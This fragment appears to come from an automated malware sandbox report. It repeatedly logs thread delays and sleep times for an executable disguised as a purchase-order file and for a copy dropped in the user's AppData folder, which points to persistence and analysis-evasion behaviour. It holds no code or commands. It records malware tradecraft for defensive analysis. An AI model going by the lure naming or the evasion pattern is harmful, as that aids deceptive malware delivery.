                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394672
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394563
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394453
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394342
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394234
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394121
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2394000
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2393891
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2393766
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2393641
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe - Thread delayed: delay time: 2393531
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2400000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399875
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399765
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399656
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399546
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399438
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399218
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399107
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398999
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398891
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398766
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398656
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398547
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398327
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398199
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398078
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397963
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397731
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397469
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397359
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397250
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397141
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397031
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396922
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396807
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396702
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396594
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396484
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396375
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396266
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396156
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396047
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395938
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395797
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395672
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395438
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395313
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395201
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394969
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394840
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394734
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394625
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394516
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394406
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394297
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394188
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2394063
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2393953
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2400000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399891
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399766
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399656
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399547
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399218
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399108
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2399000
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398672
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398343
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398124
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2398015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397899
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397789
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397649
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397540
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397437
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397328
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397219
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2397109
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396999
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396890
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396781
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396669
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396562
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396453
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396344
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396234
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396125
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2396015
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395905
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395797
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395687
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395578
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395468
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe - Thread delayed: delay time: 2395359
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395250
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395140
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2395031
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394921
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394812
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394703
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeThread delayed: delay time: 2394581
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5857
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2025
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Window / User API: threadDelayed 2977
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe | Window / User API: threadDelayed 6848
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window / User API: threadDelayed 5053
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window / User API: threadDelayed 4794
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window / User API: threadDelayed 3599
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window / User API: threadDelayed 6255
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 6788 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436 | Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5544 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep count: 32 > 30
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -29514790517935264s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2400000s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 4828 | Thread sleep count: 2977 > 30
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399868s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399748s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399640s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 4828 | Thread sleep count: 6848 > 30
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399531s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399419s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399297s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399181s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2399063s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398938s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398813s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398688s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398576s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398396s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398262s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2398101s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397985s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397860s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397735s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397606s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397485s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397360s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397235s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2397110s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396985s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396860s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396735s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396610s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396485s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396360s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396235s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2396110s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2395985s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2395860s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2395699s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2395336s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2395219s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2395109s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394999s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394891s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394781s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394672s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394563s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394453s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394342s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394234s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394121s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2394000s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2393891s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2393766s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2393641s >= -30000s
                      Source: C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe TID: 5408 | Thread sleep time: -2393531s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6724 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep count: 34 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -31359464925306218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2400000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399875s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6752 | Thread sleep count: 5053 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 6752 | Thread sleep count: 4794 > 30
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399765s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399656s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399546s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399438s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399328s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2399107s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398999s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398891s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398766s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7160 | Thread sleep time: -2398656s >= -30000s
